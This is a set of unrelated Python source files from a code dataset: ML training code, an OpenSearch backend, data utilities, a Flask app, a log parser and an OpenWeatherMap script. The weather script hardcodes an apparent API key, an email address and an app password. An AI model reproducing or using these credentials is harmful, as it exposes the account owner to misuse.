model.compile(optimizer=keras.optimizers.Nadam(lr=3e-4),\n loss='binary_crossentropy',\n metrics=['binary_accuracy', precision, recall, 'AUC'])\n\n # Model training\n history = model.fit(train_dataset, epochs=1000, validation_data=val_dataset,\n callbacks=[model_checkpoint_cb, early_stopping_cb, \n csv_logger_cb, tensorboard_cb])\n return model\n\n\ndef train_class_weights_se_resnet():\n # Computing class weights\n totals = tf.reduce_sum(y_train, axis=0).numpy()\n labels = []\n for ind, val in enumerate(totals):\n labels.extend([ind] * val)\n class_weights = compute_class_weight('balanced', np.arange(8), labels)\n class_weights = dict(enumerate(class_weights))\n\n # Training a class weighted SE_Resnet\n K.clear_session()\n tf.random.set_seed(42)\n random.seed(42)\n\n logdir = os.path.join(\"logs\", datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n tensorboard_cb = keras.callbacks.TensorBoard(logdir)\n model_checkpoint_cb = keras.callbacks.ModelCheckpoint(\n '/content/drive/MyDrive/models/SE_resnet34_class_weights.h5',\n monitor='val_loss', save_best_only=True, save_freq='epoch')\n early_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\n csv_logger_cb = tf.keras.callbacks.CSVLogger(\n '/content/drive/MyDrive/learning_curves/SE_resnet34_class_weights.csv',\n separator=\",\", append=False)\n precision = keras.metrics.Precision()\n recall = keras.metrics.Recall()\n model.compile(optimizer=keras.optimizers.Nadam(lr=3e-4), \n metrics=['binary_accuracy', precision, recall, 'AUC'],\n loss='binary_crossentropy')\n history = model.fit(train_dataset, epochs=1000, validation_data=val_dataset,\n callbacks=[tensorboard_cb, model_checkpoint_cb, \n early_stopping_cb, csv_logger_cb], \n class_weight=class_weights)\n return model\n\ndef train_oversampled_se_resnet_34():\n # Testing oversampling, creating balanced classes with copies of minority\n # classes with data augmentation\n dset_train_oversample = os.path.join(os.curdir, './records_over1000/dset_train.tfrecord')\n train_dataset_oversample = tf.data.TFRecordDataset(dset_train_oversample, compression_type='GZIP').shuffle(2048)\n train_dataset_oversample = train_dataset_oversample.map(_parse_dataset, num_parallel_calls=AUTOTUNE).batch(32).prefetch(AUTOTUNE)\n\n # Training an SE-Resnet-34 on the oversampled dataset\n K.clear_session()\n tf.random.set_seed(42)\n random.seed(42)\n one_cycle = OneCycleScheduler(11020, 32, 0.4)\n precision = keras.metrics.Precision()\n recall = keras.metrics.Recall()\n expo_lr = ExpoIncreaseLRCallback(1.035)\n model = create_resnet()\n model.compile(optimizer=keras.optimizers.Nadam(lr=3e-4), loss='binary_crossentropy', metrics=['binary_accuracy', precision, recall, 'AUC'])\n history = model.fit(train_dataset_oversample, epochs=10, validation_data=val_dataset)\n return model\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"derekdhuynh/multiple-ocular-disease-detection","sub_path":"ocularnn/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":30519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71857639549","text":"\"\"\"Communication with Marqo's persistence and search layer (OpenSearch)\"\"\"\nimport json\nfrom marqo.tensor_search.models.index_info import IndexInfo\n# client-specific modules - we may want to replace these:\nfrom marqo._httprequests import HttpRequests\nfrom marqo.config import Config\nfrom marqo.errors import MarqoError\nfrom marqo.tensor_search import validation, constants, enums\nfrom marqo.tensor_search 
import utils\nfrom marqo import errors\n#\nfrom typing import Iterable, List, Union, Optional, Tuple\nfrom marqo.tensor_search.index_meta_cache import get_cache\n\n\ndef get_index_info(config: Config, index_name: str) -> IndexInfo:\n \"\"\"Gets useful information about the index. Also updates the IndexInfo cache\n\n Args:\n config:\n index_name:\n\n Returns:\n IndexInfo of the index\n\n Raises:\n NonTensorIndexError, if the index's mapping doesn't conform to a Tensor Search index\n\n \"\"\"\n res = HttpRequests(config).get(path=F\"{index_name}/_mapping\")\n\n if not (index_name in res and \"mappings\" in res[index_name]\n and \"_meta\" in res[index_name][\"mappings\"]):\n raise errors.NonTensorIndexError(\n f\"Error retrieving index info for index {index_name}\")\n\n if \"model\" in res[index_name][\"mappings\"][\"_meta\"]:\n model_name = res[index_name][\"mappings\"][\"_meta\"][\"model\"]\n else:\n raise errors.NonTensorIndexError(\n \"get_index_info: couldn't identify embedding model name \"\n F\"in index mappings! Mapping: {res}\")\n\n if \"index_settings\" in res[index_name][\"mappings\"][\"_meta\"]:\n index_settings = res[index_name][\"mappings\"][\"_meta\"][\"index_settings\"]\n else:\n raise errors.NonTensorIndexError(\n \"get_index_info: couldn't identify index_settings \"\n F\"in index mappings! Mapping: {res}\")\n\n index_properties = res[index_name][\"mappings\"][\"properties\"]\n\n index_info = IndexInfo(model_name=model_name, properties=index_properties,\n index_settings=index_settings)\n get_cache()[index_name] = index_info\n return index_info\n\n\ndef add_customer_field_properties(config: Config, index_name: str,\n customer_field_names: Iterable[Tuple[str, enums.OpenSearchDataType]],\n model_properties: dict):\n \"\"\"Adds new customer fields to index mapping.\n\n Pushes the updated mapping to OpenSearch, and updates the local cache.\n\n Args:\n config:\n index_name:\n customer_field_names: list of 2-tuples. The first elem in the tuple is\n the new fieldnames the customers have made. The second elem is the\n inferred OpenSearch data type.\n model_properties: properties of the machine learning model\n\n Returns:\n HTTP Response\n \"\"\"\n if config.cluster_is_s2search:\n engine = \"nmslib\"\n else:\n engine = \"lucene\"\n\n body = {\n \"properties\": {\n enums.TensorField.chunks: {\n \"type\": \"nested\",\n \"properties\": {\n validation.validate_vector_name(\n utils.generate_vector_name(field_name[0])): {\n \"type\": \"knn_vector\",\n \"dimension\": model_properties[\"dimensions\"],\n \"method\": {\n \"name\": \"hnsw\",\n \"space_type\": \"cosinesimil\",\n \"engine\": engine,\n \"parameters\": {\n \"ef_construction\": 128,\n \"m\": 24\n }\n }\n } for field_name in customer_field_names\n }\n }\n }\n }\n\n existing_info = get_cache()[index_name]\n new_index_properties = existing_info.properties.copy()\n\n # copy fields to the chunk for prefiltering. 
If it is text, convert it to a keyword type to save space\n    # if it's not text, ignore it, and leave it up to OpenSearch (e.g. if it's a number)\n    for field_name in customer_field_names:\n        if field_name[1] == enums.OpenSearchDataType.text \\\n                or field_name[1] == enums.OpenSearchDataType.keyword:\n            body[\"properties\"][enums.TensorField.chunks][\"properties\"][validation.validate_field_name(field_name[0])] = {\n                \"type\": enums.OpenSearchDataType.keyword,\n                \"ignore_above\": 32766 # this is the Marqo-OS bytes limit\n            }\n\n    mapping_res = HttpRequests(config).put(path=F\"{index_name}/_mapping\", body=json.dumps(body))\n\n    merged_chunk_properties = {\n        **existing_info.properties[enums.TensorField.chunks][\"properties\"],\n        **body[\"properties\"][enums.TensorField.chunks][\"properties\"]\n    }\n    new_index_properties[enums.TensorField.chunks][\"properties\"] = merged_chunk_properties\n\n    # Save newly created fields at document level so that they are searchable by lexical search\n    # These will be undefined, and we let OpenSearch define them, the next\n    # time they're retrieved from the cache\n    existing_properties = set(existing_info.get_text_properties())\n    applying_properties = {field[0] for field in customer_field_names}\n    app_type_mapping = {field: field_type for field, field_type in customer_field_names}\n    new_properties = applying_properties - existing_properties\n    for new_prop in new_properties:\n        type_to_set = app_type_mapping[new_prop] if app_type_mapping[new_prop] == enums.OpenSearchDataType.text \\\n            else enums.OpenSearchDataType.to_be_defined\n        new_index_properties[validation.validate_field_name(new_prop)] = {\n            \"type\": type_to_set\n        }\n    get_cache()[index_name] = IndexInfo(\n        model_name=existing_info.model_name,\n        properties=new_index_properties,\n        index_settings=existing_info.index_settings.copy()\n    )\n    return mapping_res\n\n\ndef get_cluster_indices(config: Config):\n    \"\"\"Gets the name of all indices\"\"\"\n    res = HttpRequests(config).get(path=\"_aliases\")\n    indices = set(res.keys())\n    relevant_indices = indices - constants.INDEX_NAMES_TO_IGNORE\n    return relevant_indices\n","repo_name":"devwork622/marqo","sub_path":"src/marqo/tensor_search/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21468065731","text":"import numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport scipy.sparse as sp\r\nimport scipy.stats as stats\r\n\r\n\r\ndef onehot_encode(labes):\r\n    classes = set(labes)\r\n    classes_dict = {c: np.identity(len(classes))[i, :] for i, c in enumerate(classes)}\r\n    labes_onehot = np.array(list(map(classes_dict.get, labes)), dtype=np.int32)\r\n    #print(labes_onehot.shape)\r\n    return labes_onehot\r\n\r\n\r\ndef accuracy(output, labels):\r\n    preds = output.max(1)[1].type_as(labels)\r\n    correct = preds.eq(labels).double()\r\n    correct = correct.sum()\r\n    return correct / len(labels)\r\n\r\n\r\n# Weight matrix (Pearson correlation coefficient)\r\ndef set_weight(X):\r\n    X = X.detach().numpy()\r\n    # number of nodes\r\n    row = X.shape[0]\r\n    # number of features\r\n    col = X.shape[1]\r\n    # initialize the weight matrix\r\n    W = np.zeros((row, col, col))\r\n    for k in range(row):\r\n        for i in range(col):\r\n            for j in range(col):\r\n                # main-diagonal elements stay 0\r\n                if j != i:\r\n                    # Pearson\r\n                    W[k][i][j] = np.min(np.corrcoef(X[k][i], X[k][j]))\r\n                    # Spearman\r\n                    # W[k][i][j] = stats.spearmanr(X[k][i], X[k][j])[0] # returns two values: correlation, pvalue.\r\n                    # Kendall\r\n                    # W[k][i][j] = stats.kendalltau(X[k][i], X[k][j])[0] # returns two values: correlation, pvalue.\r\n    W = 
weight_threshold(W)\r\n    W = torch.FloatTensor(W)\r\n    return W\r\n\r\n\r\n# Threshold the weight matrix (zero out the 20% of entries with the smallest correlation)\r\ndef weight_threshold(W):\r\n    row = W.shape[0]\r\n    col = W.shape[1]\r\n    result = np.zeros((row, col, col))\r\n    for i in range(row):\r\n        threshold = np.sort(np.abs(W[i].flatten()))[int(col * col * 0.2)] # threshold\r\n        result[i] = W[i] * (np.abs(W[i]) >= threshold)\r\n    return result\r\n\r\n# Similarity between the generated brain network gen and the standard brain network std\r\ndef similar(gen, std):\r\n    gen = gen.detach().numpy()\r\n    std = std.detach().numpy()\r\n    row = gen.shape[0]\r\n    col = gen.shape[1]\r\n    C = np.zeros((row, 1))\r\n    for i in range(row):\r\n        G = gen[i].reshape(col, col)\r\n        tmp = np.abs(G - std)\r\n        temp = tmp ** 2\r\n        C[i] = 1 / np.sum(temp)\r\n    C = torch.FloatTensor(C)\r\n    return C\r\n\r\n# Risk prediction P\r\ndef predict(gen, std):\r\n    gen = gen.detach().numpy()\r\n    std = std.detach().numpy()\r\n    row = gen.shape[0]\r\n    col = gen.shape[1]\r\n    S = np.zeros((row, col, col))\r\n    P = np.zeros(row)\r\n    for k in range(row):\r\n        temp = gen[k].reshape(col, col)\r\n        for i in range(col):\r\n            for j in range(col):\r\n                if np.abs(temp[i, j] - std[i, j]) <= 0.1:\r\n                    S[k, i, j] = 1\r\n    for m in range(row):\r\n        P[m] = np.sum(S[m]) / (col * (col - 1))\r\n    P = torch.FloatTensor(P)\r\n    return P\r\n\r\n\r\n# Compute state-identification metrics\r\ndef identify_indicators(output, labels):\r\n    print(output.shape)\r\n    row = output.size(1)\r\n    matrix_array = torch.zeros(row, row) # confusion matrix: rows are true labels, columns are predicted labels\r\n    indicator_array = torch.zeros(row, row) # per-class indicators: rows are classes, columns are TP, FN, FP\r\n    Precision = torch.zeros(row) # Precision value for each class\r\n    Recall = torch.zeros(row) # Recall value for each class\r\n    for i in range(row):\r\n        for j in range(row):\r\n            # output.max(-1) returns each row's maximum value and its index; [0] is the value, [1] the index\r\n            matrix_array[i, j] = ((output.max(-1)[1] == j) & (labels == i)).sum()\r\n    print(\"matrix_array:\", matrix_array)\r\n    for m in range(row):\r\n        indicator_array[m, 0] = matrix_array[m, m] # TP\r\n        indicator_array[m, 1] = torch.sum(matrix_array[m]) - matrix_array[m, m] # FN\r\n        indicator_array[m, 2] = torch.sum(matrix_array[:, m]) - matrix_array[m, m] # FP\r\n    print(\"indicator_array:\", indicator_array)\r\n    ACC = torch.sum(torch.diagonal(matrix_array)) / torch.sum(matrix_array)\r\n    for n in range(row):\r\n        Precision[n] = indicator_array[n, 0] / (indicator_array[n, 0] + indicator_array[n, 2])\r\n        Recall[n] = indicator_array[n, 0] / (indicator_array[n, 0] + indicator_array[n, 1])\r\n    print(\"Precision:\", Precision)\r\n    print(\"Recall:\", Recall)\r\n    return ACC, Precision, Recall\r\n\r\n\r\n# Compute risk-prediction metrics\r\ndef predict_indicators(output, labels, num):\r\n    output[output > num] = 1\r\n    output[output <= num] = 0\r\n    TP = ((output == 1) & (labels == 1)).sum()\r\n    TN = ((output == 0) & (labels == 0)).sum()\r\n    FP = ((output == 0) & (labels == 1)).sum()\r\n    FN = ((output == 1) & (labels == 0)).sum()\r\n    ACC = (TP + TN) / (TP + TN + FP + FN)\r\n    SEN = TP / (TP + FN)\r\n    SPE = TN / (FP + TN)\r\n    BAC = (SEN + SPE) / 2\r\n    return ACC, SEN, SPE, BAC\r\n\r\n\r\n","repo_name":"fmri123456/SM-GAN","sub_path":"5_utils.py","file_name":"5_utils.py","file_ext":"py","file_size_in_byte":4732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18420064276","text":"from src.algo.stopwords import customStopWords\r\nfrom nltk.tokenize import RegexpTokenizer\r\nfrom nltk.stem.porter import PorterStemmer\r\n\r\n\r\n# function that takes list of raw texts and returns list of clean texts\r\ndef get_clean_texts(list_of_texts):\r\n    list_of_clean_texts = []\r\n    for each in list_of_texts:\r\n        cleaned_text = 
text_cleaner(each)\r\n if (cleaned_text != ''):\r\n list_of_clean_texts.append(cleaned_text)\r\n return list_of_clean_texts\r\n\r\n\r\n# function that takes a raw text and return clean text\r\ndef text_cleaner(text):\r\n tokenizer = RegexpTokenizer(r'\\w+')\r\n ps = PorterStemmer()\r\n tokenized_text = tokenizer.tokenize(text.lower())\r\n clean_tokenized_text = [] # will add words after filtering stopwords\r\n for each_token in tokenized_text:\r\n if each_token not in customStopWords():\r\n # to remove stopword tokens\r\n clean_tokenized_text.append(each_token)\r\n stemmed_text = []\r\n for token in clean_tokenized_text:\r\n # appending the stemmed words in stemmed data\r\n stemmed_text.append(ps.stem(token))\r\n clean_data = \" \".join(stemmed_text) # changing tokens into one sentence\r\n return clean_data\r\n","repo_name":"aprashantz/final-year-project-undergrad","sub_path":"backend-flask/src/algo/data_preprocessor.py","file_name":"data_preprocessor.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"18894513143","text":"#worth\r\n\r\nnome = 'guilherme'\r\ninic= 2\r\nfim = 4\r\n\r\ndef sspliter(string, index):\r\n resultado = ''\r\n for c in range(index):\r\n recebe = string[c]\r\n resultado += recebe\r\n return resultado\r\n\r\ndef sspliter2(string, start, end):\r\n atual = end\r\n if end <= 3:\r\n resultado = ''\r\n start -= 1\r\n end += start\r\n for c in range(start, end):\r\n recebe = string[c]\r\n resultado += recebe\r\n return resultado\r\n else:\r\n if end <= 4:\r\n resultado = ''\r\n start -= 1\r\n end += start\r\n for c in range(start, end):\r\n recebe = string[c - (atual - 2)]\r\n resultado += recebe\r\n return resultado\r\n\r\n\r\nif __name__ == '__main__':\r\n teste = sspliter(nome, inic)\r\n print(teste)\r\n teste2 = sspliter2(nome, inic, fim)\r\n print(teste2)","repo_name":"AliETninja/ascii_webcam_discord_bot","sub_path":"duplicidade_sspliter.py","file_name":"duplicidade_sspliter.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"69979518588","text":"import numpy as np\nimport pandas as pd\nfrom collections import Counter\nfrom functools import partial\nimport re\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder, KBinsDiscretizer, OrdinalEncoder\n\nfrom imblearn.pipeline import Pipeline\n\n\ndef grouper(elem, group_names, group_limits):\n \"\"\" Assign elem (float/int) into a group based on group_limits of groups.\n Group limits are upper bounds for groups, i.e. group can contain only elements that are less than\n its group limit. Group limit of previous group (left in the list) is the lower bound for group.\"\"\"\n return group_names[np.argmax(elem < np.array(group_limits))]\n\n\nclass CreateNewFeatures(BaseEstimator, TransformerMixin):\n \"\"\"Pipeline component that is used to create new features. New features are specified\n in transform() method.\n\n Input, i.e. 
X, must be data frame.\n Output is a new dataframe with new features added as columns.\n \"\"\"\n\n def __init__(self, group_size_limits=[2, 5, np.inf], group_rate_limits=[0.5, np.inf],\n family_size_limits=[2, 5, np.inf], family_rate_limits=[0.5, np.inf], split_other_title=False):\n self.group_size_limits = group_size_limits\n self.group_rate_limits = group_rate_limits\n self.family_size_limits = family_size_limits\n self.family_rate_limits = family_rate_limits\n self.split_other_title = split_other_title\n\n def fit(self, X, y=None):\n self.names = X['Name']\n self.familykeys = [(ticket, name.split(',')[0]) for ticket, name in X[['Ticket', 'Name']].values]\n\n self.ticket_counter = Counter(X['Ticket'])\n self.familykey_counter = Counter(self.familykeys)\n\n X_no_family = X[(X['Parch'] == 0) & (X['SibSp'] == 0)]\n self.gender_survival_rates = X_no_family.groupby(['Sex'])['Survived'].mean()\n\n self.group_survival_rates = {ticket: np.mean(X.loc[X['Ticket'] == ticket, 'Survived'])\n for ticket in self.ticket_counter\n if self.ticket_counter[ticket] > 1}\n\n self.family_survival_rates = {\n family_key: np.mean(X.loc[(np.array(self.familykeys) == family_key).all(axis=1), 'Survived'])\n for family_key in self.familykey_counter\n if self.familykey_counter[family_key] > 1\n }\n\n return self\n\n def transform(self, X, y=None):\n new_X = X.copy(deep=True)\n assert isinstance(new_X, pd.core.frame.DataFrame), 'Input must be pandas Data Frame!'\n\n # Feature that tells if passenger has cabin or not\n new_X['HasCabin'] = ~new_X['Cabin'].isna()\n\n # Feature that tells passenger's cabin type\n new_X['CabinType'] = [cabin[0] if not pd.isnull(cabin) else 'None' for cabin in new_X['Cabin']]\n\n # Feature that tells surname of passenger\n new_X['Surname'] = [name.split(',')[0] for name in new_X['Name']]\n\n # Feature for title of passenger\n p = re.compile(r'(?P\\b\\w+)\\.') # regular expression for searching title (ends always to dot)\n new_X['Title'] = [p.search(name).group('title') for name in new_X['Name']]\n\n # Feature for more grouped title of passenger\n title_mapping = {\n 'Mrs': 'Mrs',\n 'Mme': 'Mrs',\n 'Mlle': 'Miss',\n 'Miss': 'Miss',\n 'Mr': 'Mr',\n 'Master': 'Master',\n 'Rev': 'Religious'\n }\n new_X['Title_grouped'] = new_X['Title'].map(title_mapping)\n new_X['Title_grouped'].fillna('Other', inplace=True)\n if self.split_other_title:\n mr = new_X[(new_X['Title_grouped'] == 'Other') & (new_X['Sex'] == 'male')]\n miss = new_X[(new_X['Title_grouped'] == 'Other') & (new_X['Sex'] == 'female') &\n (new_X['SibSp'] == 0)]\n mrs = new_X[(new_X['Title_grouped'] == 'Other') & (new_X['Sex'] == 'female') &\n (new_X['SibSp'] > 0)]\n new_X.loc[mr.index, 'Title_grouped'] = 'Mr'\n new_X.loc[miss.index, 'Title_grouped'] = 'Miss'\n new_X.loc[mrs.index, 'Title_grouped'] = 'Mrs'\n\n\n # Feature for family size\n new_X['FamilySize'] = new_X['Parch'] + new_X['SibSp'] + 1\n\n # Group into categories\n grouper_familysize = partial(grouper, group_names=list(range(len(self.family_size_limits))),\n group_limits=self.family_size_limits)\n new_X['FamilySize_grouped'] = new_X['FamilySize'].map(grouper_familysize)\n\n # Feature for group size\n is_in_train_data = np.isin(new_X['Name'], self.names)\n not_fitted_rows = new_X.loc[~is_in_train_data, :]\n ticket_counter_test = Counter(not_fitted_rows['Ticket'])\n\n new_X['GroupSize'] = [self.ticket_counter.get(ticket, 0) + ticket_counter_test.get(ticket, 0)\n for ticket in new_X['Ticket']]\n\n # take family size if it's higher than group number based on tickets\n 
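# e.g. a passenger with SibSp=1 and Parch=2 has FamilySize 4; if only two\n        # tickets share that ticket number, np.maximum lifts GroupSize from 2 to 4\n        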
new_X['GroupSize'] = np.maximum(new_X['GroupSize'], new_X['FamilySize'])\n\n # Group into categories\n grouper_groupsize = partial(grouper, group_names=list(range(len(self.group_size_limits))),\n group_limits=self.group_size_limits)\n new_X['GroupSize_grouped'] = new_X['GroupSize'].map(grouper_groupsize)\n\n # Feature for group survival rates\n new_X['GroupRate'] = [self.group_survival_rates.get(row['Ticket'],\n self.gender_survival_rates[row['Sex']])\n for _, row in new_X.iterrows()]\n\n # GroupRate into categories\n grouper_grouprate = partial(grouper, group_names=list(range(len(self.group_rate_limits))),\n group_limits=self.group_rate_limits)\n new_X['GroupRate_grouped'] = new_X['GroupRate'].map(grouper_grouprate)\n\n # Feature for family survival rates\n new_X['FamilyRate'] = [self.family_survival_rates.get((row['Ticket'], row['Surname']),\n self.gender_survival_rates[row['Sex']])\n for _, row in new_X.iterrows()]\n\n grouper_familyrate = partial(grouper, group_names=list(range(len(self.family_rate_limits))),\n group_limits=self.family_rate_limits)\n new_X['FamilyRate_grouped'] = new_X['FamilyRate'].map(grouper_familyrate)\n\n # Feature for adjusted Fare\n new_X['Fare_adjusted'] = new_X['Fare'] / new_X['GroupSize']\n\n return new_X\n\n\nclass Preprocessor(BaseEstimator, TransformerMixin):\n\n def __init__(self, label='Survived', categorical_cols=[], numerical_cols=[], ordinal_cols=[]):\n self.label = label\n self.categorical_cols = categorical_cols\n self.numerical_cols = numerical_cols\n self.ordinal_cols = ordinal_cols\n\n def fit(self, X, y=None):\n X_features = X.copy(deep=True)\n\n if len(self.categorical_cols) == len(self.numerical_cols) == len(self.ordinal_cols) == 0:\n X_features = X.drop(columns=[self.label]) if self.label in X.columns else X.copy(deep=True)\n cat_cols = X_features.dtypes[X_features.dtypes == 'object'].index.tolist()\n self.categorical_cols = [col for col in cat_cols if len(set(X_features[col])) <= 8]\n\n num_cols = X_features.dtypes[np.isin(X_features.dtypes, ['float64'])].index.tolist()\n self.numerical_cols = [col for col in num_cols if len(set(X_features[col])) > 8]\n\n ord_cols = X_features.dtypes[np.isin(X_features.dtypes, ['int64'])].index.tolist()\n self.ordinal_cols = [col for col in ord_cols if len(set(X_features[col])) <= 8]\n\n fn_numerical = Pipeline(steps=[\n ('scaling', StandardScaler()),\n ])\n fn_categorical = Pipeline(steps=[\n ('encoding', OneHotEncoder(drop='if_binary', handle_unknown='infrequent_if_exist', sparse=False))\n ])\n fn_ordinal = Pipeline(steps=[\n ('encoding', OrdinalEncoder(handle_unknown='use_encoded_value', unknown_value=np.nan))\n ])\n\n self.preprocessor = ColumnTransformer(transformers=[\n ('num', fn_numerical, self.numerical_cols),\n ('cat', fn_categorical, self.categorical_cols),\n ('ord', fn_ordinal, self.ordinal_cols)\n ])\n self.preprocessor.fit(X_features, y)\n\n return self\n\n def get_categorical(self, X):\n return self.categorical_cols\n\n def get_numerical(self, X):\n return self.numerical_cols\n\n def get_ordinal(self, X):\n return self.ordinal_cols\n\n def transform(self, X, y=None):\n self.new_colnames = self.preprocessor.get_feature_names_out()\n return pd.DataFrame(self.preprocessor.transform(X), columns=self.new_colnames, 
index=X.index)\n","repo_name":"jiisalme/data-science-with-titanic-dataset","sub_path":"utils/feature_engineering_utils.py","file_name":"feature_engineering_utils.py","file_ext":"py","file_size_in_byte":9005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"15364157033","text":"# Code Festival 2016 qual A - B\n\n# I worked out the model answer's approach on my own and solved it with clean, model code.\nn = int(input())\nrabbits = [int(x)-1 for x in input().split()]\nans = 0\n\nfor i in range(n):\n    #print(i,rabbits[rabbits[i]])\n    if rabbits[rabbits[i]] == i:\n        ans += 1 \n\nprint(ans//2) \n    # The loop counts each matching pair twice, so the result must be divided by 2 at the end","repo_name":"idylle-cynique/atcoder_problems","sub_path":"Other-Sponsored/CodeFestival2016qualA-B.py","file_name":"CodeFestival2016qualA-B.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"2006545194","text":"import requests\n\nAPI_KEY = \"de09321be213f7333ddc68f69f0e6936\"\nMAIL = \"sue.is.developing@gmail.com\"\nPWD = \"yjlwomkdkfetmwlx\"\n\nparameters = {\n    \"lat\": \"39.31\", #52.520008\",\n    \"lon\": \"-74.5\", #13.404954\",\n    \"exclude\": \"alerts,minutely,hourly,daily\",\n    \"appid\": API_KEY,\n}\n\nresponse = requests.get(\"https://api.openweathermap.org/data/3.0/onecall\", params=parameters)\nresponse.raise_for_status()\n#data = response.json()\n","repo_name":"sierrauniformecho/day-35","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"71754429949","text":"import flask\nfrom bson.json_util import dumps\nfrom flask.templating import render_template\nfrom . import models\nfrom config.api import cabecalhos\n\nbp = flask.Blueprint(\"naves\", __name__, url_prefix=\"/naves\")\n\n@bp.route(\"\")\ndef index():\n    naves = list(models.naves())\n    return flask.render_template(\"naves/index.html\",\n                                 naves=naves)\n\n@bp.route(\"/<id>/editar\", methods=[\"GET\", \"POST\"])\ndef editar_nave(id):\n    if flask.request.method == 'GET':\n        nave = models.get_nave(id) \n        return flask.render_template(\"naves/edit.html\", nave=nave)\n    \n    elif flask.request.method == 'POST':\n        novo_nome = flask.request.form['nave_nome']\n        models.modificar_naves(id, {'nome': novo_nome})\n        return flask.redirect(flask.url_for(\"naves.index\"))\n\n@bp.route(\"/criar\", methods=[\"GET\", \"POST\"])\ndef criar_nave():\n    if flask.request.method == 'GET':\n        return flask.render_template(\"naves/edit.html\", verbo=\"Criar\")\n    \n    elif flask.request.method == 'POST':\n        nome = flask.request.form['nave_nome']\n        models.criar_naves({'nome': nome})\n        return flask.redirect(flask.url_for(\"naves.index\"))\n\n@bp.route(\"/<id>/deletar\")\ndef deletar_naves(id):\n    models.deletar_naves(id)\n    return flask.redirect(flask.url_for(\"naves.index\"))\n\n##### API #####\n\n@bp.route(\"api\")\ndef listar_naves():\n    naves = dumps(list(models.naves()))\n    return flask.Response(naves, headers=cabecalhos)\n\n@bp.route(\"api\", methods=[\"POST\"])\ndef criar_nave_api():\n    nave = flask.request.json\n    result = models.criar_naves(nave)\n    return flask.jsonify({\"id\": str(result.inserted_id)})\n\n@bp.route(\"api/<int:id>\")\ndef get_nave(id):\n    naves = dumps(list(models.get_naves())[id])\n    return flask.Response(naves, headers=cabecalhos)\n\n@bp.route(\"api/<int:id>\", methods=[\"PUT\"])\ndef modificar_nave(id):\n    nave = flask.request.json\n    naves = list(models.naves())\n    nave_velha = 
naves[id]\n result = models.modificar_naves(\n {\"_id\": nave_velha[\"_id\"]},\n nave\n )\n return flask.jsonify({\n \"modificationsa\": result.modified_count\n })\n ","repo_name":"elderlima/4linux","sub_path":"sw/naves/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31064759052","text":"import os, re\nimport os.path\nimport pprint\nimport numpy as np\nimport copy\nimport sys\n\ndef parseLog(logText):\n rawLogEntries = re.split(r'\\|\\| (?:[a-zA-Z0-9\\-\\_]* \\- )?\\*+ \\/\\\\ ([a-zA-Z0-9 \\_]*) \\/\\\\ \\**', logText, flags=re.MULTILINE)\n logEntries = {}\n for k in range(len(rawLogEntries)//2):\n index = k\n state = rawLogEntries[2*k+1].strip()\n content = rawLogEntries[2*k].strip().splitlines()\n if state not in logEntries:\n logEntries[state] = []\n logEntries[state].append((index, state, content))\n return logEntries\n\ndef summarizeLog(logEntries, filteredLogEntries):\n print(\"SUMMARY OF LOG MESSAGES:\")\n lines = []\n allKeys = list(set(logEntries.keys()) | set(filteredLogEntries.keys()))\n keyHeader = 'Entry type'\n countHeader = 'Total #'\n filtCountHeader = 'Filtered #'\n maxKeyLength = len(keyHeader)\n maxCountLength = max(len(countHeader), len(filtCountHeader))\n for key in allKeys:\n if key in logEntries:\n count = str(len(logEntries[key]))\n else:\n count = '.'\n if key in filteredLogEntries:\n filtCount = str(len(filteredLogEntries[key]))\n else:\n filtCount = '.'\n lines.append([key, count, filtCount])\n maxKeyLength = max(maxKeyLength, len(key))\n maxCountLength = max(maxCountLength, len(count), len(filtCount))\n\n tableSpec = '{key:{fill}<{keyWidth}}{filtCount:{fill}<{countWidth}}{count:{fill}<{countWidth}}'\n fillChar = ' '\n print(tableSpec.format(key=keyHeader, count=countHeader, filtCount=filtCountHeader, fill=fillChar, keyWidth=maxKeyLength+1, countWidth=maxCountLength+1))\n for line in lines:\n key, count, filtCount = line\n print(tableSpec.format(key=key, count=count, filtCount=filtCount, fill=fillChar, keyWidth=maxKeyLength+1, countWidth=maxCountLength+1))\n\ndef printLog(logEntries, abridge=False, ordered=False):\n if ordered:\n flattenedLogEntries = []\n for key in logEntries:\n flattenedLogEntries = flattenedLogEntries + logEntries[key]\n logEntries = sorted(flattenedLogEntries, key=lambda entry:entry[0])\n if abridge:\n threshold = 50\n logEntries = logEntries[:threshold//2-1] + [('...', '', '')] + logEntries[-threshold//2:]\n for logEntry in logEntries:\n index, type, lines = logEntry\n print('{index}: {type}'.format(index=index, type=type))\n for line in lines:\n print(' {line}'.format(line=line))\n else:\n logEntryKeys = logEntries.keys()\n if abridge:\n threshold = 10\n logEntries = copy.deepcopy(logEntries)\n for key in logEntryKeys:\n if len(logEntries[key]) > threshold:\n logEntries[key] = logEntries[key][:threshold//2-1] + [('...', '', '')] + logEntries[key][-threshold//2:]\n for key in logEntryKeys:\n print(key)\n for logEntry in 